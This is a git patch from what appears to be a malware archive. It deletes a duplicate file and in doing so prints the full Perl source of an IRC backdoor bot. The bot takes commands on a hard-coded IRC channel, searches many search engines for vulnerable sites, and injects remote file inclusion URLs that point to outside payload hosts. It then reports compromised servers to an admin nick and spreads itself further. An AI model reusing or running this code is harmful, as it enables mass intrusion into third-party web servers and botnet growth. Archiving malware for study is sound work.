From 3b786d92063892b8d45a4421c7a79e930b9d02fa Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Sat, 14 Nov 2020 00:57:14 -0600 Subject: [PATCH] Delete Backdoor.Perl.IRCBot.w dup --- Perl/Backdoor.Perl.IRCBot.w | 487 ------------------------------------ 1 file changed, 487 deletions(-) delete mode 100644 Perl/Backdoor.Perl.IRCBot.w diff --git a/Perl/Backdoor.Perl.IRCBot.w b/Perl/Backdoor.Perl.IRCBot.w deleted file mode 100644 index 196682ff..00000000 --- a/Perl/Backdoor.Perl.IRCBot.w +++ /dev/null @@ -1,487 +0,0 @@ -use HTTP::Request; -use LWP::UserAgent; -use IO::Socket::INET; - - -my $cmd = "http://www.wauze.de//language/lang_english/RuLeZ/me.txt?"; -my $cmdprint = "http://www.wauze.de//language/lang_english/r.txt??"; -my $nick = "UnIx|".(int(rand(99))); -my $ident = "xpl"; -my $chan = "#r4k3t"; -my $server = "211.21.73.10"; -my $http = "Googlebot"; -my $port = 6667; -my $sock; -my $proxy = 30; -my $admin = "SuPrEmO"; -my $stringa = "!scan"; -my $spread = "http://www.malteser-paderborn.de//contenido/includes/c.txt?"; -my @User_Agent = &Agent(); -my $pid = fork(); - -if($pid==0){ - &irc($nick,$ident,$chan,$server,$port); -}else{ - exit(0); -} - -sub irc(){ - my($nick,$ident,$chan,$server,$port)=@_; - $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port); - $sock->autoflush(1); - print $sock "NICK ".$nick."\r\n"; - print $sock "USER ".$ident." 8 * : By SISTEM\r\n"; - print $sock "JOIN ".$chan."\r\n"; - while( $cmdline = <$sock> ){ - if ( $cmdline =~ /PRIVMSG $chan :$stringa\s+(.*?)\s+(.*)/ ) { - if(fork() == 0){ - my($bug,$dork)=($1,$2); - &scan($bug,$dork); - exit(0); - } - } - if ($cmdline =~ /PRIVMSG $chan :!info/){ - &privmsg($chan,"9[10Per scannare9]: 15$stringa bug dork"); - } - if ($cmdline =~ /PRIVMSG $chan :!outbye/){ - exit(0); - } - if($cmdline =~ /^PING \:(.*)/){ - print $sock "PONG :$1"; - } - } -} - -sub scan(){ - my($bug,$dork)=@_; - my $contatore = 0; - &privmsg($chan,"9[10Scansione Per9]: 5Bug:".$bug); - &privmsg($chan,"9[10Scansione Per9]: 6Dork:".$dork); - my @proc; - $proc[9] = fork(); - if($proc[9] == 0){ - &privmsg($chan,"9[10Scansione Di9]: 6Google4:".scalar(&Google($dork))); - exit; - } - $proc[1] = fork(); - if($proc[1] == 0){ - &privmsg($chan,"9[10Scansione Di9]: 6Yahoo4:".scalar(&Yahoo($dork))); - exit; - } - $proc[2] = fork(); - if($proc[2] == 0){ - &privmsg($chan,"9[10Scansione Di9]: 6Altavista4:".scalar(&Altavista($dork))); - exit; - } - $proc[3] = fork(); - if($proc[3] == 0){ - &privmsg($chan,"9[10Scansione Di9]: 6Lycos4:".scalar(&Gigablast($dork))); - exit; - } - $proc[4] = fork(); - if($proc[4] == 0){ - &privmsg($chan,"9[10Scansione Di9]: 6Msn4:".scalar(&Msn($dork))); - exit; - } - $proc[5] = fork(); - if($proc[5] == 0){ - &privmsg($chan,"9[10Scansione Di9]: 6Ilse.Nl4:".scalar(&Ask($dork))); - exit; - } - $proc[6] = fork(); - if($proc[6] == 0){ - &privmsg($chan,"9[10Scansione Di9]: 6Tiscali4:".scalar(&Fireball($dork))); - exit; - } - $proc[7] = fork(); - if($proc[7] == 0){ - &privmsg($chan,"9[10Scansione Di9]: 6Alltheweb4:".scalar(&Alltheweb($dork))); - exit; - } - $proc[8] = fork(); - if($proc[8] == 0){ - &privmsg($chan,"9[10Scansione Di9]: 6Aol4:".scalar(&Aol($dork))); - exit; - } - waitpid($proc[9],0); - waitpid($proc[1],0); - waitpid($proc[2],0); - waitpid($proc[3],0); - waitpid($proc[4],0); - waitpid($proc[5],0); - waitpid($proc[6],0); - waitpid($proc[7],0); - waitpid($proc[8],0); - my @links = &GetLink(); - my @forks; - my $forked++; - &privmsg($chan,"9[10Ricerca9]: 15Totals Results:".scalar(@links)); - my @uni = &Unici(@links); - &privmsg($chan,"9[10Ricerca9]: 15Cleaned:".scalar(@uni)); - &Remove(); - my $testx = scalar(@uni); - my $startx = 0; - foreach my $sito (@uni){ - $contatore++; - my $link = "http://" . $sito . $bug . $cmd . "?"; - my $link = "http://" . $sito . $bug . $spread . "?"; - if($contatore %$proxy == 0){ - my $start = 0; - foreach my $f(@forks){ - waitpid($f,0); - $forks[$start--]; - $start++; - } - $startx = 0; - } - $forks[$startx]=fork(); - if($forks[$startx] == 0){ - my $htmlsito = &Query($link,"3"); - if($htmlsite =~ /JaheeM/ && $htmlsite =~ /uid=/){ - &privmsg($chan,"9[4SAFE OFF9]: 8"."http://" . $sito . $bug . "3" . $cmdprint . "?"); - &privmsg($admin,"9[4SAFE OFF9]: 8"."http://" . $sito . $bug . "3" . $cmdprint . "?"); - &privmsg($admin,"9[4SPreAD9]: 8"."http://" . $sito . $bug . "4" . $spread . "?"); - - } - elsif($htmlsito =~ /JaheeM/){ - &privmsg($chan,"9[11SAFE ON9]: 7"."http://" . $sito . $bug . "7" . $cmdprint . "?"); - &privmsg($admin,"9[11SAFE ON9]: 7"."http://" . $sito . $bug . "7" . $cmdprint . "?"); - &privmsg($admin,"9[11SpreaD9]: 7"."http://" . $sito . $bug . "4" . $spread . "?"); - - } - exit(0); - } - if($contatore %200 == 0){ - &privmsg($chan,"9[10Ricerca9]: 7Scannati ".$contatore." di ".$testx); - } - $startx++; - } - my $start = 0; - foreach my $f(@forks){ - waitpid($f,0); - $forks[$start--]; - $start++; - } - &privmsg($chan,"9[10Ricerca4]:".$bug .$dork); - &privmsg($chan,"9[10Ricerca4]: 7Fine."); -} - -sub privmsg(){ - my ($cha,$cosi)=@_; - print $sock "PRIVMSG ".$cha." :".$cosi."\r\n"; -} - -sub Google(){ - my($dork)=@_; - $dork=&Key($dork); - my $start; - my $num=100; - my $max=100*10; - my @dom = &GoogleDomains(); - my $file = "google.txt"; - my $html; - my @result; - foreach my $dominio (@dom){ - for($start=0;$start < $max; $start += $num){ - $html.=&Query("http://www.google.".$dominio."/search?q=".$dork."&num=100&hl=de&cr=countryDE&start=".$start."&sa=N"); - } - } - while($html =~ m/

http:\/\/(.+?)\<\/Url>/g){ - $1 =~ /yahoo/ || push(@result,&Links($1,$file)); - } - return(@result); -} - -sub Altavista(){ - my($dork)=@_; - $dork=&Key($dork); - my $start; - my $num=100; - my $max=100*10; - my $file = "altavista.txt"; - my $html; - my @result; - for($start=0;$start < $max; $start += $num){ - $html.=&Query("http://de.altavista.com/web/results?itag=ody&pg=aq&aqmode=s&aqa=".$dork."&aqp=&aqo=&aqn=&kgs=1&kls=1&filetype=&rc=dmn&swd=&lh=&nbq=50&stq=".$start); - } - while($html =~ m/(.+?)\ <\/span>/g){ - if($1 !~ /yahoo/ && $1 !~ /Altavista/){ - push(@result,&Links($1,$file)); - } - } - return(@result); -} - -sub Gigablast(){ - my($dork)=@_; - $dork=&Key($dork); - my $start; - my $max=99; - my $file = "gigablast.txt"; - my $html; - my @result; - for($start=1;$start < $max; $start += 1){ - $html.=&Query("http://suche.lycos.de/cgi-bin/pursuit?pag=".$start."&query=".$dork."&SITE=de&cat=loc&enc=utf-8"); -} - while($html =~ m/href=\"(.+?)\"/g){ - push(@result,&Links($1,$file)); - } - return(@result); -} - -sub Msn(){ - my($dork)=@_; - $dork=&Key($dork); - my $start; - my $num=10; - my $max=100*10; - my $file = "msn.txt"; - my $html; - my @result; - for($start=1;$start < $max; $start += $num){ - $html.=&Query("http://search.live.com/results.aspx?q=".$dork."&lf=1&rf=1&first=".$start); - } - while($html =~ m/(.+?)<\/a>/g){ - $1 =~ /ask/ || push(@result,&Links($3,$file)); - } - return(@result); -} - -sub Fireball(){ - my($dork)=@_; - $dork=&Key($dork); - my $start; - my $num=1; - my $max=99; - my $file = "fireball.txt"; - my $html; - my @result; - for($start=1;$start < $max; $start += $num){ - $html.=&Query("http://search-dyn.tiscali.de/search.php?key=".$dork."&collection=de&tiscalitype=web&hits=10&language=de&maxCount=&collapse=on&spell=suggest&pg=".$start."&offset=".(($start-1)*10)."&xargs="); - } - while($html =~ m/onmouseover=\"window.status=\'http:\/\/(.+?)\'/g){ - $1 =~ /tiscali/ || push(@result,&Links($1,$file)); - } - return(@result); -} - -sub Alltheweb(){ - my($dork)=@_; - $dork=&Key($dork); - my $start; - my $num=100; - my $max=100*10; - my $file = "alltheweb.txt"; - my $html; - my @result; - for($start=0;$start < $max; $start += $num){ - $html.=&Query("http://www.alltheweb.com/search?advanced=1&cat=web&type=all&hits=".$num."&ocjp=1&q=".$dork."&o=".$start); - } - while($html =~ m/http:\/\/(.+?)\ /g){ - $1 =~ /alltheweb/ || push(@result,&Links($1,$file)); - } - return(@result); -} - -sub Aol(){ - my($dork)=@_; - $dork=&Key($dork); - my $start; - my $num=1; - my $max=100; - my $file = "aol.txt"; - my $html; - my @result; - for($start=0;$start < $max; $start += $num){ - $html.=&Query("http://suche.aol.de/aol/search?query=".$dork."&page=".$start."&nt=SG2&langRestrict=2&q=".$dork."&rp=lang_de"); - } - while($html =~ m/

http:\/\/(.+?)\<\/p>/g){ - $1 =~ /aol/ || push(@result,&Links($1,$file)); - } - return(@result); -} - -sub Query(){ - my($link,$timeout)=@_; - my $req=HTTP::Request->new(GET=>$link); - my $ua=LWP::UserAgent->new(); - $ua->agent($User_Agent[rand(scalar(@User_Agent))]); - $ua->timeout($timeout); - my $response=$ua->request($req); - return $response->content; -} - -sub Key(){ - my $chiave=$_[0]; - $chiave =~ s/ /\+/g; - $chiave =~ s/:/\%3A/g; - $chiave =~ s/\//\%2F/g; - $chiave =~ s/&/\%26/g; - $chiave =~ s/\"/\%22/g; - $chiave =~ s/\\/\%5C/g; - $chiave =~ s/,/\%2C/g; - return $chiave; -} - -sub GetLink(){ - my @file = ("google.txt","yahoo.txt","altavista.txt","gigablast.txt","msn.txt","ask.txt","fireball.txt","alltheweb.txt","aol.txt"); - my $link; - my @total; - foreach my $n (@file){ - open(F,'<',$n); - while($link = ){ - $link=~s/[\r\n]//g; - push(@total,$link); - } - close(F); - } - return(@total); -} - -sub Remove(){ - my @file = ("google.txt","yahoo.txt","altavista.txt","gigablast.txt","msn.txt","ask.txt","fireball.txt","alltheweb.txt","aol.txt"); - foreach my $n (@file){ - system("rm -rf ".$n); - } -} - -sub Links(){ - my ($link,$file_print) = @_; - my $host = $link; - my $host_dir = $host; - my @links; - $host_dir=~s/(.*)\/[^\/]*$/\1/; - $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; - $host_dir=&End($host_dir); - $host=&End($host); - $link=&End($host); - push(@links,$link,$host,$host_dir); - open($file,'>>',$file_print); - print $file "$link\n$host_dir\n$host\n"; - close($file); - return @links; -} - -sub End(){ - $stringa=$_[0]; - $stringa.="/"; - $stringa=~s/\/\//\//; - while($stringa=~/\/\//){ - $stringa=~s/\/\//\//; - } - return($stringa); -} - -sub Unici{ - my @unici = (); - my %visti = (); - foreach my $elemento ( @_ ){ - next if $visti{ $elemento }++; - push @unici, $elemento; - } - return @unici; -} - -sub Agent(){ - my @ret = ( - "Microsoft Internet Explorer/4.0b1 (Windows 95)", - "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)", - "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)", - "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)", - "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)", - "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)", - "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)", - "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", - "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)", - "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", - "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)", - "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)", - "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)", - "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", - "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)", - "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", - "Microsoft Pocket Internet Explorer/0.6", - "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)", - "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;", - "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)", - "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)", - "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)", - "Advanced Browser (http://www.avantbrowser.com)", - "Avant Browser (http://www.avantbrowser.com)", - "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)", - "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)", - "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)", - "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007", - "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511", - "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929", - "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0", - "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox", - "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4", - "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5", - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6", - "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6", - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7", - "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7", - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4", - "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4", - "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5", - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1", - "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1", - "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1", - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1", - "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1", - "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2", - "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0", - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b", - "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0", - "Mozilla/3.0 (OS/2; U)", - "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)", - "Mozilla/4.61 (Macintosh; I; PPC)", - "Mozilla/4.61 [en] (OS/2; U)", - "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)", - "Mozilla/4.8 [en] (Windows NT 5.0; U)" ); -return(@ret); -} -sub GoogleDomains(){ - my @dom = ("at","ch","de","fr","gr","nl","pt","co.uk","be"); -return(@dom); -} - - -